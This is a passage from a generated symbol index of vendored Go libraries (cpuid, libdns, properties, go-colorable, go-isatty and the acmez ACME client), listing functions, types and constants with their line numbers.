(line 439) | func (c *CPUInfo) HasAll(f Features) bool { method X64Level (line 453) | func (c CPUInfo) X64Level() int { method Disable (line 473) | func (c *CPUInfo) Disable(ids ...FeatureID) bool { method Enable (line 482) | func (c *CPUInfo) Enable(ids ...FeatureID) bool { method IsVendor (line 490) | func (c CPUInfo) IsVendor(v Vendor) bool { method FeatureSet (line 495) | func (c CPUInfo) FeatureSet() []string { method RTCounter (line 504) | func (c CPUInfo) RTCounter() uint64 { method Ia32TscAux (line 516) | func (c CPUInfo) Ia32TscAux() uint32 { method LogicalCPU (line 528) | func (c CPUInfo) LogicalCPU() int { method frequencies (line 538) | func (c *CPUInfo) frequencies() { method VM (line 615) | func (c CPUInfo) VM() bool { method cacheSize (line 916) | func (c *CPUInfo) cacheSize() { method supportAVX10 (line 1486) | func (c *CPUInfo) supportAVX10() uint8 { function init (line 336) | func init() { function Detect (line 348) | func Detect() { function DetectARM (line 381) | func DetectARM() { function Flags (line 394) | func Flags() { type Features (line 428) | type Features function CombineFeatures (line 431) | func CombineFeatures(ids ...FeatureID) Features { type flags (line 620) | type flags constant flagBitsLog2 (line 623) | flagBitsLog2 = 6 constant flagBits (line 624) | flagBits = 1 << flagBitsLog2 constant flagMask (line 625) | flagMask = flagBits - 1 type flagSet (line 628) | type flagSet method inSet (line 630) | func (s *flagSet) inSet(feat FeatureID) bool { method set (line 634) | func (s *flagSet) set(feat FeatureID) { method setIf (line 639) | func (s *flagSet) setIf(cond bool, features ...FeatureID) { method unset (line 647) | func (s *flagSet) unset(offset FeatureID) { method or (line 653) | func (s *flagSet) or(other flagSet) { method hasSet (line 660) | func (s *flagSet) hasSet(other flagSet) bool { method hasSetP (line 670) | func (s *flagSet) hasSetP(other *flagSet) bool { method hasOneOf (line 680) | func (s *flagSet) hasOneOf(other *flagSet) bool { method nEnabled (line 690) | func (s *flagSet) nEnabled() (n int) { method Strings (line 718) | func (s flagSet) Strings() []string { function flagSetWith (line 697) | func flagSetWith(feat ...FeatureID) flagSet { function ParseFeature (line 707) | func ParseFeature(s string) FeatureID { function maxExtendedFunction (line 731) | func maxExtendedFunction() uint32 { function maxFunctionID (line 736) | func maxFunctionID() uint32 { function brandName (line 741) | func brandName() string { function threadsPerCore (line 753) | func threadsPerCore() int { function logicalCores (line 796) | func logicalCores() int { function familyModel (line 823) | func familyModel() (family, model, stepping int) { function physicalCores (line 846) | func physicalCores() int { function vendorID (line 891) | func vendorID() (Vendor, string) { function cacheLine (line 901) | func cacheLine() int { type SGXEPCSection (line 1037) | type SGXEPCSection struct type SGXSupport (line 1042) | type SGXSupport struct function hasSGX (line 1052) | func hasSGX(available, lc bool) (rval SGXSupport) { type AMDMemEncryptionSupport (line 1088) | type AMDMemEncryptionSupport struct function hasAMDMemEncryption (line 1097) | func hasAMDMemEncryption(available bool) (rval AMDMemEncryptionSupport) { function support (line 1114) | func support() flagSet { function valAsString (line 1494) | func valAsString(values ...uint32) []byte { FILE: vendor/github.com/klauspost/cpuid/v2/detect_arm64.go function getMidr (line 10) | func getMidr() (midr uint64) function getProcFeatures (line 11) | func getProcFeatures() (procFeatures uint64) function getInstAttributes (line 12) | func getInstAttributes() (instAttrReg0, instAttrReg1 uint64) function initCPU (line 14) | func initCPU() { function addInfo (line 21) | func addInfo(c *CPUInfo, safe bool) { FILE: vendor/github.com/klauspost/cpuid/v2/detect_ref.go function initCPU (line 8) | func initCPU() { function addInfo (line 15) | func addInfo(info *CPUInfo, safe bool) {} FILE: vendor/github.com/klauspost/cpuid/v2/detect_x86.go function asmCpuid (line 8) | func asmCpuid(op uint32) (eax, ebx, ecx, edx uint32) function asmCpuidex (line 9) | func asmCpuidex(op, op2 uint32) (eax, ebx, ecx, edx uint32) function asmXgetbv (line 10) | func asmXgetbv(index uint32) (eax, edx uint32) function asmRdtscpAsm (line 11) | func asmRdtscpAsm() (eax, ebx, ecx, edx uint32) function asmDarwinHasAVX512 (line 12) | func asmDarwinHasAVX512() bool function initCPU (line 14) | func initCPU() { function addInfo (line 22) | func addInfo(c *CPUInfo, safe bool) { FILE: vendor/github.com/klauspost/cpuid/v2/featureid_string.go function _ (line 7) | func _() { constant _FeatureID_name (line 232) | _FeatureID_name = "firstIDADXAESNIAMD3DNOWAMD3DNOWEXTAMXBF16AMXFP16AMXIN... method String (line 236) | func (i FeatureID) String() string { function _ (line 242) | func _() { constant _Vendor_name (line 275) | _Vendor_name = "VendorUnknownIntelAMDVIATransmetaNSCKVMMSVMVMwareXenHVMB... method String (line 279) | func (i Vendor) String() string { FILE: vendor/github.com/klauspost/cpuid/v2/os_darwin_arm64.go function detectOS (line 12) | func detectOS(c *CPUInfo) bool { function sysctlGetBool (line 26) | func sysctlGetBool(name string) bool { function sysctlGetString (line 34) | func sysctlGetString(name string) string { function sysctlGetInt (line 42) | func sysctlGetInt(unknown int, names ...string) int { function sysctlGetInt64 (line 55) | func sysctlGetInt64(unknown int, names ...string) int { function setFeature (line 68) | func setFeature(c *CPUInfo, name string, feature FeatureID) { function tryToFillCPUInfoFomSysctl (line 71) | func tryToFillCPUInfoFomSysctl(c *CPUInfo) { FILE: vendor/github.com/klauspost/cpuid/v2/os_linux_arm64.go constant hwcap_FP (line 18) | hwcap_FP = 1 << 0 constant hwcap_ASIMD (line 19) | hwcap_ASIMD = 1 << 1 constant hwcap_EVTSTRM (line 20) | hwcap_EVTSTRM = 1 << 2 constant hwcap_AES (line 21) | hwcap_AES = 1 << 3 constant hwcap_PMULL (line 22) | hwcap_PMULL = 1 << 4 constant hwcap_SHA1 (line 23) | hwcap_SHA1 = 1 << 5 constant hwcap_SHA2 (line 24) | hwcap_SHA2 = 1 << 6 constant hwcap_CRC32 (line 25) | hwcap_CRC32 = 1 << 7 constant hwcap_ATOMICS (line 26) | hwcap_ATOMICS = 1 << 8 constant hwcap_FPHP (line 27) | hwcap_FPHP = 1 << 9 constant hwcap_ASIMDHP (line 28) | hwcap_ASIMDHP = 1 << 10 constant hwcap_CPUID (line 29) | hwcap_CPUID = 1 << 11 constant hwcap_ASIMDRDM (line 30) | hwcap_ASIMDRDM = 1 << 12 constant hwcap_JSCVT (line 31) | hwcap_JSCVT = 1 << 13 constant hwcap_FCMA (line 32) | hwcap_FCMA = 1 << 14 constant hwcap_LRCPC (line 33) | hwcap_LRCPC = 1 << 15 constant hwcap_DCPOP (line 34) | hwcap_DCPOP = 1 << 16 constant hwcap_SHA3 (line 35) | hwcap_SHA3 = 1 << 17 constant hwcap_SM3 (line 36) | hwcap_SM3 = 1 << 18 constant hwcap_SM4 (line 37) | hwcap_SM4 = 1 << 19 constant hwcap_ASIMDDP (line 38) | hwcap_ASIMDDP = 1 << 20 constant hwcap_SHA512 (line 39) | hwcap_SHA512 = 1 << 21 constant hwcap_SVE (line 40) | hwcap_SVE = 1 << 22 constant hwcap_ASIMDFHM (line 41) | hwcap_ASIMDFHM = 1 << 23 function detectOS (line 44) | func detectOS(c *CPUInfo) bool { function isSet (line 128) | func isSet(hwc uint, value uint) bool { FILE: vendor/github.com/klauspost/cpuid/v2/os_other_arm64.go function detectOS (line 10) | func detectOS(c *CPUInfo) bool { FILE: vendor/github.com/libdns/libdns/libdns.go type RecordGetter (line 40) | type RecordGetter interface type RecordAppender (line 49) | type RecordAppender interface type RecordSetter (line 60) | type RecordSetter interface type RecordDeleter (line 78) | type RecordDeleter interface type Record (line 93) | type Record struct function RelativeName (line 111) | func RelativeName(fqdn, zone string) string { function AbsoluteName (line 118) | func AbsoluteName(name, zone string) string { FILE: vendor/github.com/magiconair/properties/decode.go method Decode (line 94) | func (p *Properties) Decode(x interface{}) error { function dec (line 105) | func dec(p *Properties, key string, def *string, opts map[string]string,... function split (line 244) | func split(s string, sep string) []string { function parseTag (line 255) | func parseTag(tag string) (key string, opts map[string]string) { function isArray (line 273) | func isArray(t reflect.Type) bool { return t.Kind() == reflect.Array ... function isBool (line 274) | func isBool(t reflect.Type) bool { return t.Kind() == reflect.Bool } function isDuration (line 275) | func isDuration(t reflect.Type) bool { return t == reflect.TypeOf(time.S... function isMap (line 276) | func isMap(t reflect.Type) bool { return t.Kind() == reflect.Map } function isPtr (line 277) | func isPtr(t reflect.Type) bool { return t.Kind() == reflect.Ptr } function isString (line 278) | func isString(t reflect.Type) bool { return t.Kind() == reflect.String } function isStruct (line 279) | func isStruct(t reflect.Type) bool { return t.Kind() == reflect.Struct } function isTime (line 280) | func isTime(t reflect.Type) bool { return t == reflect.TypeOf(time.T... function isFloat (line 281) | func isFloat(t reflect.Type) bool { function isInt (line 284) | func isInt(t reflect.Type) bool { function isUint (line 287) | func isUint(t reflect.Type) bool { FILE: vendor/github.com/magiconair/properties/integrate.go method MustFlag (line 15) | func (p *Properties) MustFlag(dst *flag.FlagSet) { FILE: vendor/github.com/magiconair/properties/lex.go type item (line 23) | type item struct method String (line 29) | func (i item) String() string { type itemType (line 42) | type itemType constant itemError (line 45) | itemError itemType = iota constant itemEOF (line 46) | itemEOF constant itemKey (line 47) | itemKey constant itemValue (line 48) | itemValue constant itemComment (line 49) | itemComment constant eof (line 53) | eof = -1 constant whitespace (line 56) | whitespace = " \f\t" type stateFn (line 59) | type stateFn type lexer (line 62) | type lexer struct method next (line 74) | func (l *lexer) next() rune { method peek (line 86) | func (l *lexer) peek() rune { method backup (line 93) | func (l *lexer) backup() { method emit (line 98) | func (l *lexer) emit(t itemType) { method ignore (line 106) | func (l *lexer) ignore() { method appendRune (line 111) | func (l *lexer) appendRune(r rune) { method accept (line 116) | func (l *lexer) accept(valid string) bool { method acceptRun (line 125) | func (l *lexer) acceptRun(valid string) { method lineNumber (line 134) | func (l *lexer) lineNumber() int { method errorf (line 140) | func (l *lexer) errorf(format string, args ...interface{}) stateFn { method nextItem (line 146) | func (l *lexer) nextItem() item { method run (line 164) | func (l *lexer) run() { method scanEscapeSequence (line 297) | func (l *lexer) scanEscapeSequence() error { method scanUnicodeLiteral (line 318) | func (l *lexer) scanUnicodeLiteral() error { function lex (line 153) | func lex(input string) *lexer { function lexBeforeKey (line 173) | func lexBeforeKey(l *lexer) stateFn { function lexComment (line 197) | func lexComment(l *lexer) stateFn { function lexKey (line 216) | func lexKey(l *lexer) stateFn { function lexBeforeValue (line 256) | func lexBeforeValue(l *lexer) stateFn { function lexValue (line 265) | func lexValue(l *lexer) stateFn { function decodeEscapedCharacter (line 339) | func decodeEscapedCharacter(r rune) rune { function atUnicodeLiteral (line 356) | func atUnicodeLiteral(r rune) bool { function isComment (line 361) | func isComment(r rune) bool { function isEndOfKey (line 366) | func isEndOfKey(r rune) bool { function isEOF (line 371) | func isEOF(r rune) bool { function isEOL (line 376) | func isEOL(r rune) bool { function isEscape (line 382) | func isEscape(r rune) bool { function isEscapedCharacter (line 388) | func isEscapedCharacter(r rune) bool { function isWhitespace (line 393) | func isWhitespace(r rune) bool { FILE: vendor/github.com/magiconair/properties/load.go type Encoding (line 16) | type Encoding constant utf8Default (line 23) | utf8Default Encoding = iota constant UTF8 (line 26) | UTF8 constant ISO_8859_1 (line 29) | ISO_8859_1 type Loader (line 32) | type Loader struct method LoadBytes (line 51) | func (l *Loader) LoadBytes(buf []byte) (*Properties, error) { method LoadAll (line 60) | func (l *Loader) LoadAll(names []string) (*Properties, error) { method LoadFile (line 93) | func (l *Loader) LoadFile(filename string) (*Properties, error) { method LoadURL (line 113) | func (l *Loader) LoadURL(url string) (*Properties, error) { method loadBytes (line 149) | func (l *Loader) loadBytes(buf []byte, enc Encoding) (*Properties, err... function Load (line 162) | func Load(buf []byte, enc Encoding) (*Properties, error) { function LoadString (line 168) | func LoadString(s string) (*Properties, error) { function LoadMap (line 174) | func LoadMap(m map[string]string) *Properties { function LoadFile (line 183) | func LoadFile(filename string, enc Encoding) (*Properties, error) { function LoadFiles (line 191) | func LoadFiles(filenames []string, enc Encoding, ignoreMissing bool) (*P... function LoadURL (line 198) | func LoadURL(url string) (*Properties, error) { function LoadURLs (line 207) | func LoadURLs(urls []string, ignoreMissing bool) (*Properties, error) { function LoadAll (line 216) | func LoadAll(names []string, enc Encoding, ignoreMissing bool) (*Propert... function MustLoadString (line 223) | func MustLoadString(s string) *Properties { function MustLoadFile (line 229) | func MustLoadFile(filename string, enc Encoding) *Properties { function MustLoadFiles (line 236) | func MustLoadFiles(filenames []string, enc Encoding, ignoreMissing bool)... function MustLoadURL (line 242) | func MustLoadURL(url string) *Properties { function MustLoadURLs (line 249) | func MustLoadURLs(urls []string, ignoreMissing bool) *Properties { function MustLoadAll (line 257) | func MustLoadAll(names []string, enc Encoding, ignoreMissing bool) *Prop... function must (line 261) | func must(p *Properties, err error) *Properties { function expandName (line 272) | func expandName(name string) (string, error) { function convert (line 279) | func convert(buf []byte, enc Encoding) string { FILE: vendor/github.com/magiconair/properties/parser.go type parser (line 12) | type parser struct method errorf (line 57) | func (p *parser) errorf(format string, args ...interface{}) { method expectOneOf (line 62) | func (p *parser) expectOneOf(expected ...itemType) (token item) { method unexpected (line 73) | func (p *parser) unexpected(token item) { method recover (line 78) | func (p *parser) recover(errp *error) { function parse (line 16) | func parse(input string) (properties *Properties, err error) { FILE: vendor/github.com/magiconair/properties/properties.go constant maxExpansionDepth (line 24) | maxExpansionDepth = 64 type ErrorHandlerFunc (line 29) | type ErrorHandlerFunc type LogHandlerFunc (line 36) | type LogHandlerFunc function LogFatalHandler (line 42) | func LogFatalHandler(err error) { function PanicHandler (line 47) | func PanicHandler(err error) { type Properties (line 55) | type Properties struct method Load (line 92) | func (p *Properties) Load(buf []byte, enc Encoding) error { method Get (line 104) | func (p *Properties) Get(key string) (value string, ok bool) { method MustGet (line 127) | func (p *Properties) MustGet(key string) string { method ClearComments (line 138) | func (p *Properties) ClearComments() { method GetComment (line 145) | func (p *Properties) GetComment(key string) string { method GetComments (line 156) | func (p *Properties) GetComments(key string) []string { method SetComment (line 166) | func (p *Properties) SetComment(key, comment string) { method SetComments (line 174) | func (p *Properties) SetComments(key string, comments []string) { method GetBool (line 187) | func (p *Properties) GetBool(key string, def bool) bool { method MustGetBool (line 198) | func (p *Properties) MustGetBool(key string) bool { method getBool (line 206) | func (p *Properties) getBool(key string) (value bool, err error) { method GetDuration (line 223) | func (p *Properties) GetDuration(key string, def time.Duration) time.D... method MustGetDuration (line 234) | func (p *Properties) MustGetDuration(key string) time.Duration { method GetParsedDuration (line 247) | func (p *Properties) GetParsedDuration(key string, def time.Duration) ... method MustGetParsedDuration (line 261) | func (p *Properties) MustGetParsedDuration(key string) time.Duration { method GetFloat64 (line 278) | func (p *Properties) GetFloat64(key string, def float64) float64 { method MustGetFloat64 (line 288) | func (p *Properties) MustGetFloat64(key string) float64 { method getFloat64 (line 296) | func (p *Properties) getFloat64(key string) (value float64, err error) { method GetInt (line 313) | func (p *Properties) GetInt(key string, def int) int { method MustGetInt (line 325) | func (p *Properties) MustGetInt(key string) int { method GetInt64 (line 338) | func (p *Properties) GetInt64(key string, def int64) int64 { method MustGetInt64 (line 348) | func (p *Properties) MustGetInt64(key string) int64 { method getInt64 (line 356) | func (p *Properties) getInt64(key string) (value int64, err error) { method GetUint (line 373) | func (p *Properties) GetUint(key string, def uint) uint { method MustGetUint (line 385) | func (p *Properties) MustGetUint(key string) uint { method GetUint64 (line 398) | func (p *Properties) GetUint64(key string, def uint64) uint64 { method MustGetUint64 (line 408) | func (p *Properties) MustGetUint64(key string) uint64 { method getUint64 (line 416) | func (p *Properties) getUint64(key string) (value uint64, err error) { method GetString (line 431) | func (p *Properties) GetString(key, def string) string { method MustGetString (line 440) | func (p *Properties) MustGetString(key string) string { method Filter (line 452) | func (p *Properties) Filter(pattern string) (*Properties, error) { method FilterRegexp (line 463) | func (p *Properties) FilterRegexp(re *regexp.Regexp) *Properties { method FilterPrefix (line 477) | func (p *Properties) FilterPrefix(prefix string) *Properties { method FilterStripPrefix (line 491) | func (p *Properties) FilterStripPrefix(prefix string) *Properties { method Len (line 506) | func (p *Properties) Len() int { method Keys (line 511) | func (p *Properties) Keys() []string { method Set (line 523) | func (p *Properties) Set(key, value string) (prev string, ok bool, err... method SetValue (line 568) | func (p *Properties) SetValue(key string, value interface{}) error { method MustSet (line 576) | func (p *Properties) MustSet(key, value string) (prev string, ok bool) { method String (line 585) | func (p *Properties) String() string { method Sort (line 596) | func (p *Properties) Sort() { method Write (line 602) | func (p *Properties) Write(w io.Writer, enc Encoding) (n int, err erro... method WriteComment (line 612) | func (p *Properties) WriteComment(w io.Writer, prefix string, enc Enco... method Map (line 663) | func (p *Properties) Map() map[string]string { method FilterFunc (line 672) | func (p *Properties) FilterFunc(filters ...func(k, v string) bool) *Pr... method Delete (line 689) | func (p *Properties) Delete(key string) { method Merge (line 702) | func (p *Properties) Merge(other *Properties) { method check (line 725) | func (p *Properties) check() error { method expand (line 734) | func (p *Properties) expand(key, input string) (string, error) { function NewProperties (line 81) | func NewProperties() *Properties { function boolVal (line 213) | func boolVal(v string) bool { function expand (line 746) | func expand(s string, keys []string, prefix, postfix string, values map[... function encode (line 792) | func encode(s string, special string, enc Encoding) string { function encodeUtf8 (line 803) | func encodeUtf8(s string, special string) string { function encodeIso (line 813) | func encodeIso(s string, special string) string { function escape (line 831) | func escape(r rune, special string) string { function invalidKeyError (line 851) | func invalidKeyError(key string) error { FILE: vendor/github.com/magiconair/properties/rangecheck.go function intRangeCheck (line 17) | func intRangeCheck(key string, v int64) int { function uintRangeCheck (line 26) | func uintRangeCheck(key string, v uint64) uint { FILE: vendor/github.com/mattn/go-colorable/colorable_appengine.go function NewColorable (line 14) | func NewColorable(file *os.File) io.Writer { function NewColorableStdout (line 23) | func NewColorableStdout() io.Writer { function NewColorableStderr (line 28) | func NewColorableStderr() io.Writer { function EnableColorsStdout (line 33) | func EnableColorsStdout(enabled *bool) func() { FILE: vendor/github.com/mattn/go-colorable/colorable_others.go function NewColorable (line 14) | func NewColorable(file *os.File) io.Writer { function NewColorableStdout (line 23) | func NewColorableStdout() io.Writer { function NewColorableStderr (line 28) | func NewColorableStderr() io.Writer { function EnableColorsStdout (line 33) | func EnableColorsStdout(enabled *bool) func() { FILE: vendor/github.com/mattn/go-colorable/colorable_windows.go constant foregroundBlue (line 21) | foregroundBlue = 0x1 constant foregroundGreen (line 22) | foregroundGreen = 0x2 constant foregroundRed (line 23) | foregroundRed = 0x4 constant foregroundIntensity (line 24) | foregroundIntensity = 0x8 constant foregroundMask (line 25) | foregroundMask = (foregroundRed | foregroundBlue | foregroundGreen ... constant backgroundBlue (line 26) | backgroundBlue = 0x10 constant backgroundGreen (line 27) | backgroundGreen = 0x20 constant backgroundRed (line 28) | backgroundRed = 0x40 constant backgroundIntensity (line 29) | backgroundIntensity = 0x80 constant backgroundMask (line 30) | backgroundMask = (backgroundRed | backgroundBlue | backgroundGreen ... constant commonLvbUnderscore (line 31) | commonLvbUnderscore = 0x8000 constant cENABLE_VIRTUAL_TERMINAL_PROCESSING (line 33) | cENABLE_VIRTUAL_TERMINAL_PROCESSING = 0x4 constant genericRead (line 37) | genericRead = 0x80000000 constant genericWrite (line 38) | genericWrite = 0x40000000 constant consoleTextmodeBuffer (line 42) | consoleTextmodeBuffer = 0x1 type wchar (line 45) | type wchar type short (line 46) | type short type dword (line 47) | type dword type word (line 48) | type word type coord (line 50) | type coord struct type smallRect (line 55) | type smallRect struct type consoleScreenBufferInfo (line 62) | type consoleScreenBufferInfo struct type consoleCursorInfo (line 70) | type consoleCursorInfo struct type Writer (line 91) | type Writer struct method Write (line 437) | func (w *Writer) Write(data []byte) (n int, err error) { function NewColorable (line 102) | func NewColorable(file *os.File) io.Writer { function NewColorableStdout (line 121) | func NewColorableStdout() io.Writer { function NewColorableStderr (line 126) | func NewColorableStderr() io.Writer { function doTitleSequence (line 390) | func doTitleSequence(er *bytes.Reader) error { function atoiWithDefault (line 429) | func atoiWithDefault(s string, def int) (int, error) { type consoleColor (line 869) | type consoleColor struct method foregroundAttr (line 877) | func (c consoleColor) foregroundAttr() (attr word) { method backgroundAttr (line 893) | func (c consoleColor) backgroundAttr() (attr word) { type hsv (line 928) | type hsv struct method dist (line 932) | func (a hsv) dist(b hsv) float32 { function toHSV (line 945) | func toHSV(rgb int) hsv { type hsvTable (line 972) | type hsvTable method find (line 982) | func (t hsvTable) find(rgb int) consoleColor { function toHSVTable (line 974) | func toHSVTable(rgbTable []consoleColor) hsvTable { function minmax3f (line 995) | func minmax3f(a, b, c float32) (min, max float32) { function n256setup (line 1018) | func n256setup() { function EnableColorsStdout (line 1030) | func EnableColorsStdout(enabled *bool) func() { FILE: vendor/github.com/mattn/go-colorable/noncolorable.go type NonColorable (line 9) | type NonColorable struct method Write (line 19) | func (w *NonColorable) Write(data []byte) (n int, err error) { function NewNonColorable (line 14) | func NewNonColorable(w io.Writer) io.Writer { FILE: vendor/github.com/mattn/go-isatty/isatty_bsd.go function IsTerminal (line 10) | func IsTerminal(fd uintptr) bool { function IsCygwinTerminal (line 17) | func IsCygwinTerminal(fd uintptr) bool { FILE: vendor/github.com/mattn/go-isatty/isatty_others.go function IsTerminal (line 8) | func IsTerminal(fd uintptr) bool { function IsCygwinTerminal (line 14) | func IsCygwinTerminal(fd uintptr) bool { FILE: vendor/github.com/mattn/go-isatty/isatty_plan9.go function IsTerminal (line 11) | func IsTerminal(fd uintptr) bool { function IsCygwinTerminal (line 21) | func IsCygwinTerminal(fd uintptr) bool { FILE: vendor/github.com/mattn/go-isatty/isatty_solaris.go function IsTerminal (line 12) | func IsTerminal(fd uintptr) bool { function IsCygwinTerminal (line 19) | func IsCygwinTerminal(fd uintptr) bool { FILE: vendor/github.com/mattn/go-isatty/isatty_tcgets.go function IsTerminal (line 10) | func IsTerminal(fd uintptr) bool { function IsCygwinTerminal (line 17) | func IsCygwinTerminal(fd uintptr) bool { FILE: vendor/github.com/mattn/go-isatty/isatty_windows.go constant objectNameInfo (line 15) | objectNameInfo uintptr = 1 constant fileNameInfo (line 16) | fileNameInfo = 2 constant fileTypePipe (line 17) | fileTypePipe = 3 function init (line 29) | func init() { function IsTerminal (line 37) | func IsTerminal(fd uintptr) bool { function isCygwinPipeName (line 46) | func isCygwinPipeName(name string) bool { function getFileNameByHandle (line 83) | func getFileNameByHandle(fd uintptr) (string, error) { function IsCygwinTerminal (line 100) | func IsCygwinTerminal(fd uintptr) bool { FILE: vendor/github.com/mholt/acmez/acme/account.go type Account (line 28) | type Account struct method SetExternalAccountBinding (line 79) | func (a *Account) SetExternalAccountBinding(ctx context.Context, clien... method NewAccount (line 103) | func (c *Client) NewAccount(ctx context.Context, account Account) (Accou... method GetAccount (line 117) | func (c *Client) GetAccount(ctx context.Context, account Account) (Accou... method UpdateAccount (line 137) | func (c *Client) UpdateAccount(ctx context.Context, account Account) (Ac... type keyChangeRequest (line 141) | type keyChangeRequest struct method AccountKeyRollover (line 151) | func (c *Client) AccountKeyRollover(ctx context.Context, account Account... method postAccount (line 182) | func (c *Client) postAccount(ctx context.Context, endpoint string, accou... type accountObject (line 204) | type accountObject struct type EAB (line 224) | type EAB struct constant StatusPending (line 241) | StatusPending = "pending" constant StatusProcessing (line 242) | StatusProcessing = "processing" constant StatusValid (line 243) | StatusValid = "valid" constant StatusInvalid (line 244) | StatusInvalid = "invalid" constant StatusDeactivated (line 245) | StatusDeactivated = "deactivated" constant StatusExpired (line 246) | StatusExpired = "expired" constant StatusRevoked (line 247) | StatusRevoked = "revoked" constant StatusReady (line 248) | StatusReady = "ready" FILE: vendor/github.com/mholt/acmez/acme/ari.go type RenewalInfo (line 43) | type RenewalInfo struct method GetRenewalInfo (line 62) | func (c *Client) GetRenewalInfo(ctx context.Context, b64CertIDSeq string... method UpdateRenewalInfo (line 86) | func (c *Client) UpdateRenewalInfo(ctx context.Context, account Account,... function CertIDSequence (line 121) | func CertIDSequence(_ context.Context, certChain []*x509.Certificate, ha... type certID (line 193) | type certID struct FILE: vendor/github.com/mholt/acmez/acme/authorization.go type Authorization (line 29) | type Authorization struct method IdentifierValue (line 74) | func (authz Authorization) IdentifierValue() string { method fillChallengeFields (line 83) | func (authz *Authorization) fillChallengeFields(account Account) error { method NewAuthorization (line 105) | func (c *Client) NewAuthorization(ctx context.Context, account Account, ... method GetAuthorization (line 142) | func (c *Client) GetAuthorization(ctx context.Context, account Account, ... method PollAuthorization (line 175) | func (c *Client) PollAuthorization(ctx context.Context, account Account,... method DeactivateAuthorization (line 221) | func (c *Client) DeactivateAuthorization(ctx context.Context, account Ac... function authzIsFinalized (line 245) | func authzIsFinalized(authz Authorization) (bool, error) { FILE: vendor/github.com/mholt/acmez/acme/certificate.go type Certificate (line 32) | type Certificate struct method GetCertificateChain (line 64) | func (c *Client) GetCertificateChain(ctx context.Context, account Accoun... method RevokeCertificate (line 136) | func (c *Client) RevokeCertificate(ctx context.Context, account Account,... constant ReasonUnspecified (line 165) | ReasonUnspecified = iota constant ReasonKeyCompromise (line 166) | ReasonKeyCompromise constant ReasonCACompromise (line 167) | ReasonCACompromise constant ReasonAffiliationChanged (line 168) | ReasonAffiliationChanged constant ReasonSuperseded (line 169) | ReasonSuperseded constant ReasonCessationOfOperation (line 170) | ReasonCessationOfOperation constant ReasonCertificateHold (line 171) | ReasonCertificateHold constant _ (line 172) | _ constant ReasonRemoveFromCRL (line 173) | ReasonRemoveFromCRL constant ReasonPrivilegeWithdrawn (line 174) | ReasonPrivilegeWithdrawn constant ReasonAACompromise (line 175) | ReasonAACompromise FILE: vendor/github.com/mholt/acmez/acme/challenge.go type Challenge (line 32) | type Challenge struct method HTTP01ResourcePath (line 94) | func (c Challenge) HTTP01ResourcePath() string { method DNS01TXTRecordName (line 104) | func (c Challenge) DNS01TXTRecordName() string { method DNS01KeyAuthorization (line 118) | func (c Challenge) DNS01KeyAuthorization() string { method InitiateChallenge (line 126) | func (c *Client) InitiateChallenge(ctx context.Context, account Account,... constant ChallengeTypeHTTP01 (line 139) | ChallengeTypeHTTP01 = "http-01" constant ChallengeTypeDNS01 (line 140) | ChallengeTypeDNS01 = "dns-01" constant ChallengeTypeTLSALPN01 (line 141) | ChallengeTypeTLSALPN01 = "tls-alpn-01" constant ChallengeTypeDeviceAttest01 (line 142) | ChallengeTypeDeviceAttest01 = "device-attest-01" FILE: vendor/github.com/mholt/acmez/acme/client.go type Client (line 55) | type Client struct method GetDirectory (line 84) | func (c *Client) GetDirectory(ctx context.Context) (Directory, error) { method provision (line 91) | func (c *Client) provision(ctx context.Context) error { method provisionDirectory (line 107) | func (c *Client) provisionDirectory(ctx context.Context) error { method nonce (line 137) | func (c *Client) nonce(ctx context.Context) (string, error) { method pollInterval (line 155) | func (c *Client) pollInterval() time.Duration { method pollTimeout (line 162) | func (c *Client) pollTimeout() time.Duration { type Directory (line 174) | type Directory struct type DirectoryMeta (line 187) | type DirectoryMeta struct type stack (line 195) | type stack struct method push (line 200) | func (s *stack) push(v string) { method pop (line 212) | func (s *stack) pop() string { type cachedDirectory (line 233) | type cachedDirectory struct constant replayNonce (line 240) | replayNonce = "Replay-Nonce" constant defaultPollInterval (line 243) | defaultPollInterval = 250 * time.Millisecond constant defaultPollTimeout (line 244) | defaultPollTimeout = 5 * time.Minute FILE: vendor/github.com/mholt/acmez/acme/http.go method httpPostJWS (line 43) | func (c *Client) httpPostJWS(ctx context.Context, privateKey crypto.Signer, method httpReq (line 133) | func (c *Client) httpReq(ctx context.Context, method, endpoint string, j... method doHTTPRequest (line 260) | func (c *Client) doHTTPRequest(req *http.Request, buf *bytes.Buffer) (re... method httpClient (line 313) | func (c *Client) httpClient() *http.Client { method userAgent (line 320) | func (c *Client) userAgent() string { function extractLinks (line 334) | func extractLinks(resp *http.Response, rel string) []string { function parseMediaType (line 355) | func parseMediaType(resp *http.Response) string { function retryAfter (line 372) | func retryAfter(resp *http.Response, fallback time.Duration) (time.Durat... function retryAfterTime (line 388) | func retryAfterTime(resp *http.Response) (time.Time, error) { FILE: vendor/github.com/mholt/acmez/acme/jws.go type keyID (line 43) | type keyID constant noKeyID (line 47) | noKeyID = keyID("") function jwsEncodeEAB (line 56) | func jwsEncodeEAB(accountKey crypto.PublicKey, hmacKey []byte, kid keyID... function jwsEncodeJSON (line 92) | func jwsEncodeJSON(claimset any, key crypto.Signer, kid keyID, nonce, ur... function jwkEncode (line 128) | func jwkEncode(pub crypto.PublicKey) (string, error) { function jwsHead (line 169) | func jwsHead(alg, nonce, url string, kid keyID, key crypto.Signer) (stri... function jwsFinal (line 189) | func jwsFinal(sha crypto.Hash, sig []byte, phead, payload string) ([]byt... function jwsSign (line 212) | func jwsSign(key crypto.Signer, hash crypto.Hash, digest []byte) ([]byte... function jwsHasher (line 237) | func jwsHasher(pub crypto.PublicKey) (string, crypto.Hash) { function jwkThumbprint (line 256) | func jwkThumbprint(pub crypto.PublicKey) (string, error) { FILE: vendor/github.com/mholt/acmez/acme/order.go type Order (line 31) | type Order struct type Identifier (line 91) | type Identifier struct method NewOrder (line 105) | func (c *Client) NewOrder(ctx context.Context, account Account, order Or... method GetOrder (line 118) | func (c *Client) GetOrder(ctx context.Context, account Account, order Or... method FinalizeOrder (line 132) | func (c *Client) FinalizeOrder(ctx context.Context, account Account, ord... function orderIsFinished (line 221) | func orderIsFinished(order Order) (bool, error) { FILE: vendor/github.com/mholt/acmez/acme/problem.go type Problem (line 27) | type Problem struct method Error (line 76) | func (p Problem) Error() string { method MarshalLogObject (line 97) | func (p Problem) MarshalLogObject(enc zapcore.ObjectEncoder) error { type Subproblem (line 110) | type Subproblem struct method MarshalLogObject (line 120) | func (sp Subproblem) MarshalLogObject(enc zapcore.ObjectEncoder) error { type loggableSubproblems (line 127) | type loggableSubproblems method MarshalLogArray (line 131) | func (ls loggableSubproblems) MarshalLogArray(enc zapcore.ArrayEncoder... constant ProblemTypeNamespace (line 